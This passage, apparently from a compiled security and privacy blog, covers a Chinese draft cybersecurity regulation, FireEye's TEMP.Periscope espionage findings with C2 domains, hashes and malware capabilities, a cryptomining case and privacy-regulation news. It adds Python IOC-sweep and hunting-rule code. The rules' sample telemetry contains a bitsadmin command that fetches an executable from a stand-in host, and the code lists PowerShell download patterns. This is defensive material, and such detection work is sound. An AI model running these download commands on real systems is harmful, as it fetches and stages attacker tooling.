  • Grading Review. The considerations for classified level grading include network functions, scope of services, types of service recipients and types of data being processed. For networks graded at Level 2 or above, the operator is required to conduct an expert review and then obtain approval from any relevant industry regulator. Cross provincial or national uniform connected networks must be graded and organized for review by the industry regulator.
  • Grading Filing. After grading review, any networks graded at Level 2 or above must file with a public security authority at or above county level, after confirmation of the classified level. The filing certificate should be issued after satisfactory review by the relevant public security authority. The timeline for the relevant public security authority to review such applications is not defined in the Draft Regulation, and is within the authority’s discretion.
  • General Obligations of Cybersecurity Protection. Most of the general cybersecurity obligations are stated in the Cybersecurity Law, and the Draft Regulation stipulates additional obligations, such as:
    • In the event of detection, blocking or elimination of illegal activity, network operators must prevent the illegal activity from spreading and prevent the destruction or loss of evidence of crimes.
    • Retain network records (logs).
    • Report cybersecurity incidents to the local public security authority with jurisdiction within 24 hours. Where state secrets could be divulged, reports must be made to the local secrecy administration with jurisdiction at the same time.
  • Special Obligations of Security Protection. The networks graded at Level 3 or above require a higher standard for their network operators, which will bear general liability and special liability, including:
    • designating the department of cybersecurity and forming a level-by-level examination system for any change of network, access, operation and maintenance provider;
    • reviewing the plan or strategy developed by professional technical personnel;
    • conducting a background check on key cybersecurity personnel, and confirming those personnel have relevant professional certificates;
    • managing the security of service providers;
    • dynamically monitoring the network and establishing a connection with the public security authority at the same level;
    • implementing redundancy, back-up and recovery measures for important network equipment, communications links and systems; and
    • establishing a classified assessment scheme, conducting such assessments, rectifying the results, and reporting the information to relevant authorities.
  • Online Testing Before Operation. Network operators at Level 2 or above must test the security of new networks before operation. Assessments must be performed at least once a year. For new networks at Level 3 or above, the classified assessment must be conducted by a cybersecurity classified assessment entity before operation and annually thereafter. Based on the results, the network operators must rectify the risks and report to the public security authority with its filing records.
  • Procurement. The network products used for the “important part” of the network must be evaluated by a professional assessment entity. If a product has an impact on national security, it must be checked by the state cyberspace authorities and relevant departments of the State Council. The Draft Regulation does not clearly define what the “important part” of a network means.
  • Maintenance. Maintenance of networks graded at Level 3 or above must be conducted in China. If business needs require cross-border maintenance, cybersecurity evaluations and risk control measures must take place before performance of such cross-border maintenance. Maintenance records must be kept for public security’s inspection.
  • Protection of Data and Information Security. Network operators must protect the security of their data and information in the process of collection, storage, transmission, use, supply and destruction, and keep recovery and backup files in a different place. Personal information protection requirements in the Draft Regulation are similar to those found under the Cybersecurity Law.
  • Protection of Networks Using Cryptography. Networks involving state secrets are subject to the state secrecy protection rules. Networks graded at Level 3 or above must be protected with cryptography, and operators must engage the relevant entities to test the security of the cryptographic application. Upon passing the evaluation, the network may go online and must be evaluated once a year. The results of the evaluation must be filed with (1) the public security authority holding the network’s filing record and (2) the cryptography management authority where the operator is located.

Powers of the Competent Authorities

In addition to regular supervision and inspection, the Draft Regulation gives the competent authorities more powerful measures to handle investigations and emergencies. During an investigation, when necessary, the competent authorities may order the operator to block information transmission, shut down the network temporarily and backup relevant data. In case of an emergency, the competent authorities may order the operator to disconnect the network and shut down servers.

Penalties for Violations

The Cybersecurity Law includes liability provisions for violations of security protection, technical maintenance, and data security and personal information protection, as well as enforcement of the Draft Regulation. The penalties include rectification orders, fines, relevant business suspension, business closing or website shut-down pending rectification, and revocation of relevant business permits and/or licenses.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally

Introduction

FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."


Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.


Figure 2: Human rights protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).


Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academia, aviation, chemicals, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB), possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting the maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to businesses worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Each entry below lists the redirect site (legitimate, not malicious), the AIRBREAK downloader file name with its MD5, and the AIRBREAK C2 domain.

  • Redirect site: en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html
    • AIRBREAK downloader: TOP_NEWS_Japan_to_Support_the_Election.js (MD5 3c51c89078139337c2c92e084bb0904c) [Figure 4]
    • AIRBREAK C2: chemscalere[.]com
  • Redirect site: iric.gov.kh/LICADHO/Interview-Questions.pdf
    • AIRBREAK downloader: [pdf]Interview-Questions.pdf.js (MD5 e413b45a04bf5f812912772f4a14650f)
    • AIRBREAK C2: scsnewstoday[.]com
  • Redirect site: iric.gov.kh/LICADHO/Interview-Questions.pdf
    • AIRBREAK downloader: [docx]Interview-Questions.docx.js (MD5 cf027a4829c9364d40dcab3f14c1f6b7)
    • AIRBREAK C2: scsnewstoday[.]com
  • Redirect site: unknown
    • AIRBREAK downloader: Interview_Questions.docx.js (MD5 c8fdd2b2ddec970fa69272fdf5ee86cc)
    • AIRBREAK C2: scsnewstoday[.]com
  • Redirect site: atimes.com/article/philippines-draws-three-hard-new-lines-on-china/
    • AIRBREAK downloader: Philippines-draws-three-hard-new-lines-on-china .js (MD5 5d6ad552f1d1b5cfe99ddb0e2bb51fd7)
    • AIRBREAK C2: mlcdailynews[.]com
  • Redirect site: facebook.com/CNR.Movement/videos/190313618267633/
    • AIRBREAK downloader: CNR.Movement.mp4.js (MD5 217d40ccd91160c152e5fce0143b16ef)
    • AIRBREAK C2: partyforumseasia[.]com

Table 1: AIRBREAK downloaders


Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js
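The indicators in Table 1 (C2 domains, downloader MD5s) and the defanged URLs in the Historical OSINT post above are only useful once they are normalized and run against your own telemetry. The following Python is an added example written for this page, not FireEye's tooling or anything from the original post: it refangs published indicators (hxxp://, [.]), sweeps a proxy log for requests to the C2 domains or their subdomains, and checks a file inventory against the known hashes. The log line format, file paths and the "document-name-plus-.js" heuristic for spotting AIRBREAK-style downloaders are my own assumptions, and the sample log lines are constructed; the domains, hashes and file names are the ones published in the post.

```python
"""Sweep proxy logs and a file inventory for the TEMP.Periscope indicators above.

Added example (not FireEye's tooling). Domains, MD5s and file names are copied
from the post; the log format, paths and the double-extension heuristic are
assumptions made for illustration.
"""
import re
from urllib.parse import urlsplit

# C2 domains exactly as published (defanged with [.]), see Table 1.
C2_DOMAINS_DEFANGED = [
    "chemscalere[.]com",
    "scsnewstoday[.]com",
    "mlcdailynews[.]com",
    "partyforumseasia[.]com",
]

# MD5s of the AIRBREAK downloaders in Table 1 plus the decoy document.
KNOWN_MD5 = {
    "3c51c89078139337c2c92e084bb0904c",  # TOP_NEWS_Japan_to_Support_the_Election.js
    "e413b45a04bf5f812912772f4a14650f",  # [pdf]Interview-Questions.pdf.js
    "cf027a4829c9364d40dcab3f14c1f6b7",  # [docx]Interview-Questions.docx.js
    "c8fdd2b2ddec970fa69272fdf5ee86cc",  # Interview_Questions.docx.js
    "5d6ad552f1d1b5cfe99ddb0e2bb51fd7",  # Philippines-draws-three-hard-new-lines-on-china .js
    "217d40ccd91160c152e5fce0143b16ef",  # CNR.Movement.mp4.js
    "ba1e5b539c3ae21c756c48a8b5281b7e",  # Interview Questions.docx (decoy)
}

# Heuristic of my own (not from the post): every Table 1 downloader is a .js
# file named as if it were a document or video, so flag "<name>.<doc-ext>.js".
DOUBLE_EXT_RE = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|mp4)\s*\.js$", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Undo the usual defanging (hxxp://, [.], [:]) so an IOC can be compared to live data."""
    s = ioc.strip().lower()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def host_matches(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain of it, never for look-alike names."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


# Assumed proxy log format: "<timestamp> <client_ip> <method> <url> <status>".
PROXY_LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def sweep_proxy_log(lines, c2_domains=C2_DOMAINS_DEFANGED):
    """Return (client_ip, host, url) for each request whose host is a known C2 domain."""
    domains = [refang(d) for d in c2_domains]
    hits = []
    for line in lines:
        m = PROXY_LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip it rather than abort the sweep
        _ts, client, _method, url, _status = m.groups()
        host = urlsplit(url).hostname or ""
        if any(host_matches(host, d) for d in domains):
            hits.append((client, host, url))
    return hits


def sweep_file_inventory(inventory, known_md5=KNOWN_MD5):
    """inventory: iterable of (path, md5). A hash match outranks the name heuristic."""
    findings = []
    for path, md5 in inventory:
        name = path.rsplit("/", 1)[-1]
        if md5.lower() in known_md5:
            findings.append((path, "known-hash"))
        elif DOUBLE_EXT_RE.search(name):
            findings.append((path, "double-extension-js"))
    return findings


# Constructed sample data. The first line is the legitimate redirect site from
# Table 1 and must NOT be flagged; the next two reach C2 domains (one via a subdomain).
SAMPLE_PROXY_LOG = [
    "2018-06-25T10:12:46Z 10.0.0.5 GET http://en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html 200",
    "2018-06-25T10:12:47Z 10.0.0.5 GET http://chemscalere.com/TOP_NEWS_Japan_to_Support_the_Election.js 200",
    "2018-06-25T10:13:02Z 10.0.0.9 GET https://cdn.scsnewstoday.com/update.php 200",
    "2018-06-25T10:15:00Z 10.0.0.7 GET https://www.example.org/ 200",
    "not a log line",
]
SAMPLE_INVENTORY = [  # constructed paths; first hash is the Table 1 downloader
    ("/home/user/Downloads/Interview_Questions.docx.js", "c8fdd2b2ddec970fa69272fdf5ee86cc"),
    ("/home/user/Downloads/report.pdf.js", "0" * 32),
    ("/home/user/Downloads/notes.txt", "1" * 32),
]

if __name__ == "__main__":
    for hit in sweep_proxy_log(SAMPLE_PROXY_LOG):
        print("C2 contact:", *hit)
    for finding in sweep_file_inventory(SAMPLE_INVENTORY):
        print("file finding:", *finding)
```

Two design points matter in practice: the redirect sites in Table 1 are legitimate and must stay out of the block list, which is why only the C2 column is used for matching; and the subdomain match is anchored on a leading dot so that a look-alike such as notchemscalere.com is not flagged. The name heuristic will produce some noise, so the block reports it separately from the hash matches instead of merging the two.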

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.


Figure 5: SCANBOX welcome page

The list below gives the copied article topics grouped by article source (the sources were not compromised):

  • Khmer Times
    • Leaders confident yet nervous
    • Mahathir_ 'We want to be friendly with China
    • PM urges voters to support CPP for peace
    • CPP determined to maintain Kingdom's peace and development
    • Bun Chhay's wife dies at 60
    • Crackdown planned on boycott callers
    • Further floods coming to Kingdom
    • Kem Sokha again denied bail
    • PM vows to stay on as premier to quash traitors
  • Fresh News
    • Iran_ Don't trust Trump
    • Kim-Trump summit_ Singapore's role
  • Reuters
    • Trump's North Korea summit may bring peace declaration - but at a cost
    • U.S. pushes NATO to ready more forces to deter Russian threat
    • us-nato-russia_us-pushes-nato-to-ready-more-forces-to-deter-russian-threat
  • Phnom Penh Post
    • Interior Minister Sar Kheng warns of dirty tricks
    • Another player to enter market for cashless pay
  • ABC News
    • Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America
  • The Cambodia Daily
    • China-funded national road inaugurated in Cambodia
  • Asia Times
    • Kim and Trump in first summit session in Singapore
  • U.S. News
    • U.S. to suspend military exercises with South Korea, Trump says
  • BREAKING NEWS
    • Rainsy defamed the King_ Hun Sen
  • Associated Press
    • cambodia-opposition-leader-denied-bail-again-in-treason-case

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

  • EVILTECH (function: backdoor)
    • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
    • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or a connection to another attacker-controlled system.
  • DADBOD (function: credential theft)
    • DADBOD is a tool used to steal user cookies.
    • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed the IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of those addresses, 112.66.188.28, is located in Hainan, China. The other addresses belong to virtual private servers, but artifacts indicate that in all cases the computers used to log in were configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Chinese arrest 20 in major Crypto Currency Mining scam

According to the Chinese-language publication Legal Daily, police in two districts of China have arrested 20 people for their roles in a major cryptocurrency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company (大连昇平网络科技有限) that was designed to covertly mine three types of coins: DigiByte (DGB, currently valued at USD$0.03 each), Siacoin (SC, currently valued at $0.01 each) and Decred (DCR, currently valued at $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

The investigation began when Tencent detected a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first-person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."

Tencent referred the case to the Wei'an Municipal Public Security Bureau, which handled the case extremely well. As investigators learned more about the trojans, they first identified the social media groups and forums where the trojan was being spread, and then traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Mobao was a forum moderator on a site called the "Tianxia Internet Bar Forum", and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.

Mobao popularized the cheat program by encouraging others to suggest new functionality. The users of the tool did not suspect that they were mining cryptocurrency while using the cheat. More than 30,000 victims were using his cheat software and secretly mining cryptocurrency for him.

Yang Mobao had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes. He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, with the cards' firmware preloaded to perform mining. It turns out that these cards ALSO were trojaned! As a major customer of Dalian Yuping, Mobao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.

Yang is described as a self-taught computer programmer who had previously worked managing Internet cafes. After profiting from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province. The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them to embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in video cafes. The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans. In addition to the illegal advertising software embedded in those 3.89 million video cards, their cryptocurrency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou. Chen Mou could then cash them out at any time in the future.
16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems. Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by Reporter Xy Peng and correspondent Liu Guizeng Wang Yen.) (记者 徐鹏 通讯员 刘贵增 王艳)

FTC Issues Warning Letters for Potential COPPA Violations

On April 27, 2018, the Federal Trade Commission issued two warning letters to foreign marketers of geolocation tracking devices for violations of the U.S. Children’s Online Privacy Protection Act (“COPPA”). The first letter was directed to a Chinese company, Gator Group, Ltd., that sold the “Kids GPS Gator Watch” (marketed as a child’s first cellphone); the second was sent to a Swedish company, Tinitell, Inc., marketing a child-based app that works with a mobile phone worn like a watch. Both products collect a child’s precise geolocation data, and the Gator Watch includes geofencing “safe zones.”  

Importantly, in commenting on its ability to reach foreign companies that target U.S. children, the FTC stated that “[t]he COPPA Rule applies to foreign-based websites and online services that are involved in commerce in the United States. This would include, among others, foreign-based sites or services that are directed to children in the United States, or that knowingly collect personal information from children in the United States.”

In both letters, the FTC warned that it had specifically reviewed the foreign operators’ online services and had identified potential COPPA violations (i.e., a failure to provide direct notice or obtain parental consent prior to collecting geolocation data). The FTC stated that it expected the companies to come into compliance with COPPA, including in the case of Tinitell, which had stopped marketing the watch in an effort to adhere to COPPA’s ongoing obligation to keep children’s data secure.

National Standard on Personal Information Security Goes into Effect in China

On May 1, 2018, the Information Security Technology – Personal Information Security Specification (the “Specification”) went into effect in China. The Specification is not binding and cannot be used as a direct basis for enforcement. However, enforcement agencies in China can still use the Specification as a reference or guideline in their administration and enforcement activities. For this reason, the Specification should be taken seriously as a best practice in personal data protection in China, and should be complied with where feasible.

The Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents. It includes (without limitation) basic principles for personal information security, notice and consent requirements, security measures, rights of data subjects and requirements related to internal administration and management. The Specification establishes a definition of sensitive personal information, and provides specific requirements for its collection and use.

Read our previous blog post from January 2018 for a more detailed description of the Specification.

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.
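As an added example (not from the FireEye report), the following Python hunting rules encode the host-level TTPs in the list above and run them over constructed Sysmon-style events; the PowerShell download markers and the explorer.exe-parent test for the Startup-folder shortcut are assumptions, and every path, host and URL in the sample records is invented.

```python
"""Hunting rules for the TEMP.Periscope host-level TTPs listed above.

Added example (not from the FireEye report). Input is a list of
constructed Sysmon-style events: EventID 1 = process creation,
EventID 11 = file create, EventID 19/20/21 = WMI event filter /
consumer / binding. Field names follow Sysmon's schema; the records
themselves are made up.
"""
from __future__ import annotations

import ntpath
from typing import Iterable

# Staging directories named in the report.
STAGING_DIRS = ("c:\\windows\\debug", "c:\\perflogs")
# Startup-folder path fragment where the .lnk persistence lives.
STARTUP_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# Download idioms in PowerShell command lines (assumption: a generic
# heuristic, not something the report enumerates).
PS_DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "start-bitstransfer")
# Sysmon WMI subscription events; a permanent subscription is the usual
# WMI persistence mechanism.
WMI_EVENTS = {19: "WmiEventFilter", 20: "WmiEventConsumer", 21: "WmiEventConsumerToFilter"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_staging_dir(path: str) -> bool:
    p = path.lower()
    return any(p.startswith(d + "\\") for d in STAGING_DIRS)


def match_event(event: dict) -> list[str]:
    """Return the names of every rule the event matches (empty if nothing fires)."""
    hits: list[str] = []
    eid = event.get("EventID")
    if eid == 1:
        image = _basename(event.get("Image", ""))
        parent = _basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "").lower()
        # bitsadmin.exe fetching tooling: /transfer creates a BITS download job.
        if image == "bitsadmin.exe" and "/transfer" in cmd:
            hits.append("bitsadmin_download")
        if image == "powershell.exe" and any(m in cmd for m in PS_DOWNLOAD_MARKERS):
            hits.append("powershell_download")
        # Jscript backdoor started from a Startup-folder .lnk: explorer.exe
        # resolves the shortcut at logon, so wscript.exe appears as its child
        # running a .js/.jse file (the explorer.exe-parent test is an assumption).
        if image == "wscript.exe" and parent == "explorer.exe" and (".js" in cmd or ".jse" in cmd):
            hits.append("startup_lnk_wscript")
        if _in_staging_dir(event.get("Image", "")):
            hits.append("staging_dir_execution")
    elif eid == 11:
        target = event.get("TargetFilename", "")
        if _in_staging_dir(target):
            hits.append("staging_dir_file_write")
        if STARTUP_MARKER in target.lower() and target.lower().endswith(".lnk"):
            hits.append("startup_lnk_dropped")
    elif eid in WMI_EVENTS:
        hits.append("wmi_persistence_" + WMI_EVENTS[eid])
    return hits


def hunt(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Run every rule over every event; returns (rule, RecordId) pairs in event order."""
    return [(rule, ev["RecordId"]) for ev in events for rule in match_event(ev)]


# Constructed sample telemetry. File names mt.exe and x.js come from the
# report's indicator table; every path, host and URL here is invented.
SAMPLE_EVENTS = [
    {"RecordId": "r1", "EventID": 1, "Image": "C:\\Windows\\System32\\bitsadmin.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "bitsadmin /transfer job1 http://example.invalid/mt.exe C:\\Perflogs\\mt.exe"},
    {"RecordId": "r2", "EventID": 11, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetFilename": "C:\\Perflogs\\mt.exe"},
    {"RecordId": "r3", "EventID": 1, "Image": "C:\\Perflogs\\mt.exe",
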